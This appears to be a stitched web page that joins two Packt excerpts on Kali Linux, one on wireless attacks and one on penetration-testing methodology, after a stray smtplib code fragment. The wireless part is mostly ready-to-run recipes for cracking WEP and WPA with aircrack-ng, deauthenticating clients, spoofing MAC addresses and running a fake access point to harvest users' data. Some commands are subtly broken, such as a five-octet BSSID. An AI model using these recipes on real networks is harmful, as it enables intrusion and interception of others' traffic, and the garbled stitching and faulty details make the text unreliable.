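with smtplib.SMTP("127.0.0.1", 25) as smtp:
    smtp.send_message(msg)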


Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of an Ethernet cable is not feasible. For this convenience, there is a price to be paid: wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic, including mobile phones and wireless networks. We will cover the following topics in this article:

Wireless network WEP cracking
Wireless network WPA/WPA2 cracking
Automating wireless network cracking
Accessing clients using a fake AP
URL traffic manipulation
Port redirection
Sniffing network traffic

(For more resources related to this topic, see here.)

Wireless network WEP cracking

Wired Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA, and later by WPA2. Because more secure protocols are available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption, and we will explore one of those ways in this recipe. In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack-NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key.

Getting ready

In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. Please ensure your wireless card allows packet injection, as this is not something that all wireless cards support.

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WEP.

Open a terminal window and bring up a list of wireless network interfaces:

airmon-ng

Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step:

airmon-ng stop wlan0
ifconfig wlan0 down

Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55:

macchanger --mac 00:11:22:33:44:55 wlan0

Now we need to restart airmon-ng:

airmon-ng start wlan0

Next, we will use airodump to locate the available wireless networks nearby:

airodump-ng wlan0

A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click your mouse, and select copy. Also, make note of the channel on which the network is transmitting its signal. You will find this information in the Channel column. In this case, the channel is 10.
Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

-c allows us to select our channel. In this case, we use 10.
-w allows us to select the name of our file. In this case, we have chosen wirelessattack.
--bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.

airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

A new terminal window will open, displaying the output from the previous command. Leave this window open.

Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 -a [BSSID] -h [our chosen MAC address] -e [ESSID] [Interface]

aireplay-ng -1 0 -a 09:AC:90:AB:78 -h 00:11:22:33:44:55 -e backtrack wlan0

Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 -b [BSSID] -h [our chosen MAC address] [Interface]

aireplay-ng -3 -b 09:AC:90:AB:78 -h 00:11:22:33:44:55 wlan0

Your screen will begin to fill with traffic. Let this process run for a minute or two, until we have enough information to run the crack. Finally, we run AirCrack to crack the WEP key:

aircrack-ng -b 09:AC:90:AB:78 wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a WEP-secured wireless connection and then mathematically analyzing the data to recover the WEP key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then running aircrack-ng against the generated CAP file in order to recover the wireless key.

Wireless network WPA/WPA2 cracking

WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack-NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key.

Getting ready

In order to perform the tasks of this recipe, experience with the Kali Linux terminal window is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.

Open a terminal window and bring up a list of wireless network interfaces:

airmon-ng

Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

Next, we need to stop the wlan0 interface and take it down:
airmon-ng stop wlan0
ifconfig wlan0 down

Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55:

macchanger --mac 00:11:22:33:44:55 wlan0

Now we need to restart airmon-ng:

airmon-ng start wlan0

Next, we will use airodump to locate the available wireless networks nearby:

airodump-ng wlan0

A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel on which the network is transmitting its signal. You will find this information in the Channel column. In this case, the channel is 10.

Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

-c allows us to select our channel. In this case, we use 10.
-w allows us to select the name of our file. In this case, we have chosen wirelessattack.
--bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.

airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

A new terminal window will open, displaying the output from the previous command. Leave this window open.

Open another terminal window; to force a client to reconnect and capture a handshake, we will run aireplay, which has the following syntax: aireplay-ng --deauth 1 -a [BSSID] -c [our chosen MAC address] [Interface]. This process may take a few moments:

aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0

Finally, we run AirCrack to crack the WPA key. The -w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier; in this case, the file's name is wirelessattack.cap:

aircrack-ng -w ./wordlist.lst wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by capturing the handshake from a WPA-secured wireless connection and then trying candidate passwords against the captured handshake until a match is found. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to deauthenticate a client of the wireless device we were attacking so that it would reconnect and produce a handshake. We concluded by gathering the handshake traffic and then brute-forcing the generated CAP file in order to recover the wireless password.

Automating wireless network cracking

In this recipe, we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts.

Getting ready

A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of performing an automated wireless network crack with Gerix by downloading it. Using wget, download Gerix from the following location:
wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar

Once the file has been downloaded, we need to extract the data from the RAR file:

unrar x gerix-wifi-cracker-master.rar

Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools:

mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker

Let's navigate to the directory where Gerix is located:

cd /usr/share/gerix-wifi-cracker

To begin using Gerix, we issue the following command:

python gerix.py

Click on the Configuration tab and select your wireless interface.
Click on the Enable/Disable Monitor Mode button.
Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button.
The list of targeted networks will begin to fill. Select a wireless network to target; in this case, we select a WEP encrypted network.
Click on the WEP tab.
Under Functionalities, click on the Start Sniffing and Logging button.
Click on the WEP Attacks (No Client) subtab.
Click on the Start false access point authentication on victim button.
Click on the Start the ChopChop attack button.
In the terminal window that opens, answer Y to the Use this packet question.
Once completed, copy the generated .cap file.
Click on the Create the ARP packet to be injected on the victim access point button.
Click on the Inject the created packet on victim access point button.
In the terminal window that opens, answer Y to the Use this packet question.
Once you have gathered approximately 20,000 packets, click on the Cracking tab.
Click on the Aircrack-ng – Decrypt WEP Password button.

That's it!

How it works...

In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitor mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we used ChopChop to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forcing the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP-secured network.

Accessing clients using a fake AP

In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack.

Getting ready

A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of creating a fake AP with Gerix.

Navigate to the directory where Gerix is located:

cd /usr/share/gerix-wifi-cracker

To begin using Gerix, we issue the following command:

python gerix.py

Click on the Configuration tab and select your wireless interface.
Click on the Enable/Disable Monitor Mode button.
Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button.
The list of targeted networks will begin to fill. Select a wireless network to target; in this case, we select a WEP encrypted network.
Click on the Fake AP tab.
Change the Access Point ESSID from honeypot to something less suspicious; in this case, we are going to use personalnetwork.
We will use the defaults for each of the other options.
To start the fake access point, click on the Start Fake Access Point button.

That's it!

How it works...

In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. Fake access points are a great tool to use because, to the victim, they appear to be a legitimate access point, and are therefore trusted by the user. Using Gerix, we were able to automate the setup of a fake access point in a few short clicks.
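Looking back at the WPA cracking recipe, it can help to see what aircrack-ng is actually doing with each wordlist entry. The following Python sketch is ours, not part of the AirCrack suite: it derives the WPA pairwise master key (PMK) from a candidate passphrase with PBKDF2, which is the expensive step a dictionary attack repeats for every guess. The SSID and wordlist values are illustrative:

import hashlib

ssid = "backtrack"                                   # ESSID from the recipe above
wordlist = ["password1", "letmein", "S3cr3tWiFi"]    # stand-in for wordlist.lst

for candidate in wordlist:
    # WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)
    pmk = hashlib.pbkdf2_hmac("sha1", candidate.encode(), ssid.encode(), 4096, 32)
    print(candidate, "->", pmk.hex())
    # aircrack-ng then expands each PMK into a PTK using the handshake nonces
    # and checks it against the captured MIC; a match reveals the passphrase.

The 4,096 rounds of hashing per guess are why WPA dictionary attacks are slow and why a long, non-dictionary passphrase remains effective.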

Penetration Testing and Setup

Packt
27 Sep 2013
35 min read
(For more resources related to this topic, see here.)

Penetration Testing goes beyond an assessment by evaluating identified vulnerabilities to verify whether each vulnerability is real or a false positive. For example, an audit or an assessment may utilize scanning tools that report a few hundred possible vulnerabilities across multiple systems. A Penetration Test would attempt to attack those vulnerabilities in the same manner as a malicious hacker to verify which vulnerabilities are genuine, reducing the real list of system vulnerabilities to a handful of security weaknesses. The most effective Penetration Tests are the ones that target a very specific system with a very specific goal. Quality over quantity is the true test of a successful Penetration Test. Enumerating a single system during a targeted attack reveals more about system security, and about the response time for handling incidents, than a wide-spectrum attack. By carefully choosing valuable targets, a Penetration Tester can determine the entire security infrastructure and the associated risk for a valuable asset.

Penetration Testing evaluates the effectiveness of existing security; this is a common misinterpretation and should be clearly explained to all potential customers. If a customer does not have strong security, they will receive little value from Penetration Testing services. As a consultant, it is recommended that Penetration Testing services are offered as a means to verify the security of existing systems, once a customer believes they have exhausted all efforts to secure those systems and are ready to evaluate whether there are any remaining gaps.

Positioning a proper scope of work is critical when selling Penetration Testing services. The scope of work defines what systems and applications are being targeted, as well as what toolsets may be used to compromise vulnerabilities that are found. Best practice is working with your customer during a design session to develop an acceptable scope of work that doesn't impact the value of the results.

Web Penetration Testing with Kali Linux, covering the next generation of BackTrack, is a hands-on guide that will provide you with step-by-step methods for finding vulnerabilities and exploiting web applications. This article will cover researching targets, identifying and exploiting vulnerabilities in web applications as well as in clients using web application services, defending web applications against common attacks, and building Penetration Testing deliverables for a professional services practice. We believe this article is great for anyone who is interested in learning how to become a Penetration Tester, for users who are new to Kali Linux and want to learn the features and differences between Kali and BackTrack, and for seasoned Penetration Testers who may need a refresher or reference on new tools and techniques. This article will break down the fundamental concepts behind various security services as well as guidelines for building a professional Penetration Testing practice. Concepts include differentiating a Penetration Test from other services, a methodology overview, and targeting web applications. This article also provides a brief overview of setting up a Kali Linux testing or live environment.

Web application Penetration Testing concepts

A web application is any application that uses a web browser as a client. This can be a simple message board or a very complex spreadsheet.
Web applications are popular based on ease of access to services and centralized management of a system used by multiple parties. Requirements for accessing a web application can follow industry web browser client standards, simplifying expectations for both the service providers and the hosts accessing the application. Web applications are the most widely used type of application within any organization. They are the standard for most Internet-based applications. If you look at smartphones and tablets, you will find that most applications on these devices are also web applications. This has created a new and large target-rich surface for security professionals as well as for attackers exploiting those systems.

Penetration Testing web applications can vary in scope, since there is a vast number of system types and business use cases for web application services. The core web application tiers, which are the hosting servers, accessing devices, and data repository, should be tested, along with communication between the tiers, during a web application Penetration Testing exercise.

An example of developing a scope for a web application Penetration Test is testing a Linux server hosting applications for mobile devices. The scope of work at a minimum should include evaluating the Linux server (operating system, network configuration, and so on), the applications hosted from the server, how systems and users authenticate, the client devices accessing the server, and communication between all three tiers. Additional areas of evaluation that could be included in the scope of work are how devices are obtained by employees, how devices are used outside of accessing the application, the surrounding network(s), maintenance of the systems, and the users of the systems. Some examples of why these other areas of scope matter are having the Linux server compromised by permitting a connection from a mobile device infected by other means, or an authorized mobile device being obtained through social engineering and used to capture confidential information. Some deliverable examples in this article offer checkbox surveys that can assist with walking a customer through possible targets for a web application Penetration Testing scope of work. Every scope of work should be customized around your customer's business objectives, expected timeframe of performance, allocated funds, and desired outcome. As stated before, templates serve as tools to enhance a design session for developing a scope of work.

Penetration Testing methodology

There are logical steps recommended for performing a Penetration Test. The first step is identifying the project's starting status. The most common terminology defining the starting state is Black box testing, White box testing, or a blend between White and Black box testing known as Gray box testing. Black box testing assumes the Penetration Tester has no prior knowledge of the target network, company processes, or services it provides. Starting a Black box project requires a lot of reconnaissance and is typically a longer engagement, based on the concept that real-world attackers can spend long durations of time studying targets before launching attacks. As security professionals, we find Black box testing presents some problems when scoping a Penetration Test. Depending on the system and your familiarity with the environment, it can be difficult to estimate how long the reconnaissance phase will last. This usually presents a billing problem.
Customers, in most cases, are not willing to write a blank cheque for you to spend unlimited time and resources on the reconnaissance phase; however, if you do not spend the time needed, your Penetration Test is over before it has begun. It is also unrealistic, because a motivated attacker will not necessarily have the same scoping and billing restrictions as a professional Penetration Tester. That is why we recommend Gray box over Black box testing.

White box testing is when a Penetration Tester has intimate knowledge about the system. The goals of the Penetration Test are clearly defined, and the outcome of the report from the test is usually expected. The tester has been provided with details on the target, such as network information, types of systems, company processes, and services. White box testing is typically focused on a particular business objective, such as meeting a compliance need, rather than a generic assessment, and can be a shorter engagement, depending on how the target space is limited. White box assignments can reduce information gathering efforts, such as reconnaissance services, which equals less cost for Penetration Testing services.

Gray box testing falls in between Black and White box testing. It is when the client or system owner agrees that some unknown information will eventually be discovered during a Reconnaissance phase, but allows the Penetration Tester to skip this part. The Penetration Tester is provided with some basic details of the target; however, internal workings and some other privileged information are still kept from the Penetration Tester. Real attackers tend to have some information about a target prior to engaging it. Most attackers (with the exception of script kiddies, or individuals who download tools and run them) do not choose random targets. They are motivated and have usually interacted in some way with their target before attempting an attack. Gray box testing is an attractive approach for many security professionals conducting Penetration Tests, because it mimics the real-world approaches used by attackers and focuses on vulnerabilities rather than reconnaissance.

The scope of work defines how penetration services will be started and executed. Kicking off a Penetration Testing service engagement should include an information gathering session used to document the target environment and define the boundaries of the assignment, to avoid unnecessary reconnaissance services or attacking systems that are out of scope. A well-defined scope of work will save a service provider from scope creep (defined as uncontrolled changes or continuous growth in a project's scope), keep the engagement within the expected timeframe, and help provide a more accurate deliverable upon concluding services.

Real attackers do not have boundaries such as time, funding, ethics, or tools, meaning that limiting a Penetration Testing scope may not represent a real-world scenario. In contrast to a limited scope, having an unlimited scope may never evaluate critical vulnerabilities if a Penetration Test is concluded prior to attacking the desired systems. For example, a Penetration Tester may capture user credentials to critical systems and conclude by accessing those systems, without ever testing how vulnerable those systems are to network-based attacks. It's also important to include who is aware of the Penetration Test as a part of the scope. Real attackers may strike at any time, and probably when people are least expecting it.
Some fundamentals for developing a scope of work for a Penetration Test are as follows:

Definition of Target System(s): This specifies what systems should be tested. This includes the location on the network, the types of systems, and the business use of those systems.

Timeframe of Work Performed: When the testing should start, and what the timeframe is for meeting the specified goals. Best practice is NOT to limit the time scope to business hours.

How Targets Are Evaluated: What types of testing methods, such as scanning or exploitation, are and are not permitted? What is the risk associated with the specific testing methods that are permitted? What is the impact of targets that become inoperable due to penetration attempts? Examples are using social networking by pretending to be an employee, launching a denial of service attack on key systems, or executing scripts on vulnerable servers. Some attack methods pose a higher risk of damaging systems than others.

Tools and software: What tools and software are used during the Penetration Test? This is important and a little controversial. Many security professionals believe that if they disclose their tools, they will be giving away their secret sauce. We believe this is only the case when security professionals use widely available commercial products and simply rebrand the canned reports from those products. Seasoned security professionals will disclose the tools being used and, in some cases when vulnerabilities are exploited, documentation of the commands used within the tools to exploit a vulnerability. This makes the exploit re-creatable and allows the client to truly understand how the system was compromised and the difficulty associated with the exploit.

Notified Parties: Who is aware of the Penetration Test? Are they briefed beforehand and able to prepare? Is reaction to penetration efforts part of the scope being tested? If so, it may make sense not to inform the security operations team prior to the Penetration Test. This is very important when looking at web applications that may be hosted by another party, such as a cloud service provider, that could be impacted by your services.

Initial Access Level: What type of information and access is provided prior to kicking off the Penetration Test? Does the Penetration Tester have access to the server via the Internet and/or intranet? What type of initial account-level access is granted? Is this a Black, White, or Gray box assignment for each target?

Definition of Target Space: This defines the specific business functions included in the Penetration Test. For example, conducting a Penetration Test on a specific web application used by sales while not touching a different application hosted on the same server.

Identification of Critical Operation Areas: Define the systems that should not be touched, to avoid a negative impact from the Penetration Testing services. Is the active authentication server off limits? It's important to make critical assets clear prior to engaging a target.

Definition of the Flag: It is important to define how far a Penetration Test should compromise a system or a process. Should data be removed from the network, or should the attacker just obtain a specific level of unauthorized access?

Deliverable: What type of final report is expected? What goals does the client specify to be accomplished upon closing a Penetration Testing service agreement? Make sure the goals are not open-ended, to avoid scope creep of the expected service. Is any of the data classified or designated for a specific group of people?
How should the final report be delivered? It is important to deliver a sample report, or periodic updates, so that there are no surprises in the final report.

Remediation expectations: Are vulnerabilities expected to be documented with possible remediation action items? Who should be notified if a system is rendered unusable during a Penetration Testing exercise? What happens if sensitive data is discovered? Most Penetration Testing services do NOT include remediation of the problems found.

Some service definitions that should be used to define the scope of services are:

Security Audit: Evaluating a system's or an application's risk level against a set of standards or baselines. Standards are mandatory rules, while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies, and processes. Most requests for security services for audits are focused on passing an official audit (for example, preparing for a corporate or a government audit) or proving that the baseline requirements are met for a mandatory set of regulations (for example, following the HIPAA and HITECH mandates for protecting healthcare records). It is important to inform potential customers whether your audit services include any level of insurance or protection if an audit isn't successful after your services. It's also critical to document the type of remediation included with audit services (that is, whether you would identify a problem, offer a remediation action plan, or fix the problem). Auditing for compliance is much more than running a security tool. It relies heavily on standard types of reporting and on following a methodology that is an accepted standard for the audit. In many cases, security audits give customers a false sense of security, depending on what standards or baselines are being audited. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today's cyber world. It is HIGHLY recommended to offer security services beyond standards and baselines, to raise the level of security to an acceptable level of protection against real-world threats. Services should include following up with customers to assist with remediation, along with raising the bar for security beyond any industry standards and baselines.

Vulnerability Assessment: This is the process by which network devices, operating systems, and application software are scanned in order to identify the presence of known and unknown vulnerabilities. A vulnerability is a gap, error, or weakness in how a system is designed, used, or protected. When a vulnerability is exploited, it can result in unauthorized access, escalation of privileges, denial-of-service to the asset, or other outcomes. Vulnerability Assessments typically stop once a vulnerability is found, meaning that the Penetration Tester doesn't execute an attack against the vulnerability to verify whether it's genuine. A Vulnerability Assessment deliverable provides the potential risk associated with all the vulnerabilities found, along with possible remediation steps. There are many solutions, such as Kali Linux, that can be used to scan for vulnerabilities based on system/server type, operating system, ports open for communication, and other means. Vulnerability Assessments can be White, Gray, or Black box depending on the nature of the assignment. Vulnerability scans are only useful if they calculate risk.
The downside of many security audits is vulnerability scan results that make security audits thicker without providing any real value. Many vulnerability scanners produce false positives or identify vulnerabilities that are not really there. They do this because they incorrectly identify the OS, or because they look for specific patches that fix vulnerabilities while missing rollup patches (patches that contain multiple smaller patches) or software revisions. Assigning risk to vulnerabilities gives a true definition and sense of how vulnerable a system is. In many cases, this means that vulnerability reports produced by automated tools need to be verified. Customers will want to know the risk associated with a vulnerability and the expected cost of reducing any risk found. To provide the value of cost, it's important to understand how to calculate risk.

Calculating risk

It is important to understand how to calculate the risk associated with the vulnerabilities found, so that a decision can be made on how to react. Most customers look to the CISSP triangle of CIA when determining the impact of risk. CIA is the confidentiality, integrity, and availability of a particular system or application. When determining the impact of risk, customers must look at each component individually, as well as the vulnerability in its entirety, to gain a true perspective of the risk and determine the likelihood of impact. It is up to the customer to decide whether the risk associated with a vulnerability justifies or outweighs the cost of the controls required to reduce the risk to an acceptable level. A customer may not be able to spend a million dollars on remediating a threat that compromises guest printers; however, they will be very willing to spend twice as much on protecting systems with the company's confidential data.

The Certified Information Systems Security Professional (CISSP) curriculum lists the formulas for calculating risk as follows. A Single Loss Expectancy (SLE) is the cost of a single loss to an Asset Value (AV). The Exposure Factor (EF) is the impact the loss of the asset will have on the organization, such as loss of revenue due to an Internet-facing server shutting down. Customers should calculate the SLE of an asset when evaluating security investments, to help identify the level of funding that should be assigned for controls. If an SLE would cause a million dollars of damage to the company, it would make sense to consider that in the budget.

The Single Loss Expectancy formula: SLE = AV * EF

The next important formula is identifying how often the SLE could occur. If an SLE worth a million dollars could happen once in a million years, such as a meteor falling out of the sky, it may not be worth investing millions in a protective dome around your headquarters. In contrast, if a fire could cause a million dollars worth of damage and is expected every couple of years, it would be wise to invest in a fire prevention system. The number of times an asset is expected to be lost per year is the Annual Rate of Occurrence (ARO). The Annualized Loss Expectancy (ALE) is an expression of the annual anticipated loss due to risk. For example, a meteor falling has a very low annualized expectancy (once in a million years), while a fire is a lot more likely and should be calculated into future investments for protecting a building.

The Annualized Loss Expectancy formula: ALE = SLE * ARO

The final and important question to answer is the risk associated with an asset, which is used to figure out the investment in controls.
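To ground these formulas before moving on to overall risk, here is a minimal Python sketch using the fire example above. The dollar amounts and exposure factor are illustrative assumptions of ours, not values from any real engagement:

# Illustrative values only: a $2,000,000 building where a fire would
# destroy half of it, expected roughly once every two years.
asset_value = 2_000_000      # AV, in dollars
exposure_factor = 0.5        # EF, fraction of the asset lost per incident
annual_rate = 0.5            # ARO, incidents per year (once every two years)

sle = asset_value * exposure_factor   # SLE = AV * EF
ale = sle * annual_rate               # ALE = SLE * ARO

print(f"SLE: ${sle:,.0f}")   # $1,000,000 lost per fire
print(f"ALE: ${ale:,.0f}")   # $500,000 anticipated loss per year

An ALE of $500,000 per year makes a fire prevention system an easy sell; running the same numbers with an ARO of one in a million explains why no one budgets for meteor domes.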
The answer can determine whether, and how much, the customer should invest in remediating a vulnerability found in an asset.

The Risk formula: Risk = Asset Value * Threat * Vulnerability * Impact

It is common for customers not to have values for the variables in Risk Management formulas. These formulas serve as guidance systems to help the customer better understand how they should invest in security. In the previous examples, using the formulas with estimated values for a meteor strike and a fire in a building should help explain, in estimated dollar value, why a fire prevention system is a better investment than a metal dome protecting against falling objects.

Penetration Testing is the method of attacking system vulnerabilities in a similar way to real malicious attackers. Typically, Penetration Testing services are requested when a system or network has exhausted investments in security and clients are seeking to verify whether all avenues of security have been covered. Penetration Testing can be Black, White, or Gray box, depending on the scope of work agreed upon. The key difference between a Penetration Test and a Vulnerability Assessment is that a Penetration Test will act upon the vulnerabilities found and verify whether they are real, reducing the list of confirmed risks associated with a target. A Vulnerability Assessment of a target could change into a Penetration Test once the asset owner has authorized the service provider to execute attacks against the vulnerabilities identified in the target. Typically, Penetration Testing services have a higher cost associated with them, since the services require more expensive resources, tools, and time to successfully complete assignments.

One popular misconception, because Penetration Testing services have a higher cost than other security services, is that a Penetration Test enhances IT security: Penetration Testing does not make IT networks more secure, since the services evaluate existing security! A customer should not consider a Penetration Test if there is a belief that the target is not already well secured.

Penetration Testing can cause a negative impact on systems: it's critical to have authorization in writing from the proper authorities before starting a Penetration Test of an asset owned by another party. Not having proper authorization could be seen as illegal hacking by the authorities. Authorization should include who is liable for any damages caused during a penetration exercise, as well as who should be contacted to avoid future negative impacts once a system is damaged. Best practice is alerting the customers to all the potential risks associated with each method used to compromise a target prior to executing the attack, to level-set expectations. This is also one of the reasons we recommend targeted Penetration Testing with a small scope; it is easier to be much more methodical in your approach. As a common best practice, we obtain confirmation that, in a worst-case scenario, a system can be restored by the customer using backups or some other disaster recovery method.

Penetration Testing deliverable expectations should be well defined while agreeing on a scope of work. The most common method by which hackers obtain information about targets is social engineering, attacking people rather than systems. An example is interviewing for a position within the organization and walking out a week later with sensitive data offered without resistance.
This type of deliverable may not be acceptable if a customer is interested in knowing how vulnerable their web applications are to remote attack. It is also important to have a defined end-goal so that all parties understand when the penetration services are considered concluded. Usually, an agreed-upon deliverable serves this purpose. A Penetration Testing engagement's success for a service provider is based on the profitability of the time and services used to deliver the engagement. A more efficient and accurate process means better results for fewer services used. The higher the quality of the deliverables, the closer the service can meet customer expectations, resulting in a better reputation and more future business. For these reasons, it's important to develop a methodology for executing Penetration Testing services as well as for reporting what is found.

Kali Penetration Testing concepts

Kali Linux is designed to follow the flow of a Penetration Testing service engagement. Regardless of whether the starting point is White, Black, or Gray box testing, there is a set of steps that should be followed when Penetration Testing a target with Kali or other tools.

Step 1 – Reconnaissance

You should learn as much as possible about a target's environment and system traits prior to launching an attack. The more information you can identify about a target, the better your chance of identifying the easiest and fastest path to success. Black box testing requires more reconnaissance than White box testing, since data is not provided about the target(s). Reconnaissance services can include researching a target's Internet footprint; monitoring resources, people, and processes; scanning for network information such as IP addresses and system types; social engineering public services such as a help desk; and other means.

Reconnaissance is the first step of a Penetration Testing service engagement, regardless of whether you are verifying known information or seeking new intelligence on a target. Reconnaissance begins by defining the target environment based on the scope of work. Once the target is identified, research is performed to gather intelligence on the target, such as what ports are used for communication, where it is hosted, the type of services being offered to clients, and so on. This data shapes a plan of action regarding the easiest methods of obtaining the desired results. The deliverable of a reconnaissance assignment should include a list of all the assets being targeted, what applications are associated with the assets, the services used, and the possible asset owners. Kali Linux offers a category labeled Information Gathering that serves as a Reconnaissance resource. Tools include methods to research network, data center, wireless, and host systems.

The following is the list of Reconnaissance goals:

Identify target(s)
Define applications and business use
Identify system types
Identify available ports
Identify running services
Passively social engineer information
Document findings

Step 2 – Target evaluation

Once a target is identified and researched through Reconnaissance efforts, the next step is evaluating the target for vulnerabilities. At this point, the Penetration Tester should know enough about the target to select how to analyze it for possible vulnerabilities or weaknesses. Examples include testing for weaknesses in how the web application operates, in identified services, and in communication ports.
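As a tiny illustration of probing communication ports, here is a hedged Python sketch of a TCP connect scan. The target address and port list are placeholders of ours, and real tools such as Nmap do far more (service fingerprinting, timing control, stealth scans); scan only hosts you are authorized to test:

import socket

target = "192.168.1.10"               # placeholder lab host
ports = [21, 22, 25, 80, 443, 8080]   # a few common service ports

for port in ports:
    # TCP connect scan: a completed three-way handshake means the port is open.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1.0)
    try:
        if sock.connect_ex((target, port)) == 0:
            print(f"{port}/tcp open")
    finally:
        sock.close()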
Vulnerability Assessments and Security Audits typically conclude after this phase of the target evaluation process. Capturing detailed information through Reconnaissance improves the accuracy of targeting possible vulnerabilities, shortens the execution time of target evaluation services, and helps to evade existing security. For example, running a generic vulnerability scanner against a web application server would probably alert the asset owner, take a while to execute, and only generate generic details about the system and applications. Scanning a server for a specific vulnerability based on data obtained from Reconnaissance would be harder for the asset owner to detect, provide a good possible vulnerability to exploit, and take seconds to execute.

Evaluating targets for vulnerabilities can be manual or automated through tools. There is a range of tools offered in Kali Linux, grouped in a category labeled Vulnerability Analysis. Tools range from assessing network devices to databases.

The following is the list of Target Evaluation goals:

Evaluate targets for weakness
Identify and prioritize vulnerable systems
Map vulnerable systems to asset owners
Document findings

Step 3 – Exploitation

This step exploits the vulnerabilities found to verify whether the vulnerabilities are real and what possible information or access can be obtained. Exploitation separates Penetration Testing services from passive services such as Vulnerability Assessments and Audits. Exploitation and all the following steps have legal ramifications without authorization from the asset owners of the target.

The success of this step is heavily dependent on previous efforts. Most exploits are developed for specific vulnerabilities and can cause undesired consequences if executed incorrectly. Best practice is identifying a handful of vulnerabilities and developing an attack strategy that leads with the most vulnerable first. Exploiting targets can be manual or automated, depending on the end objective. Some examples are running SQL injections to gain admin access to a web application, or social engineering a help desk person into providing admin login credentials. Kali Linux offers a dedicated catalog of tools titled Exploitation Tools for exploiting targets, ranging from exploits for specific services to social engineering packages.

The following is the list of Exploitation goals:

Exploit vulnerabilities
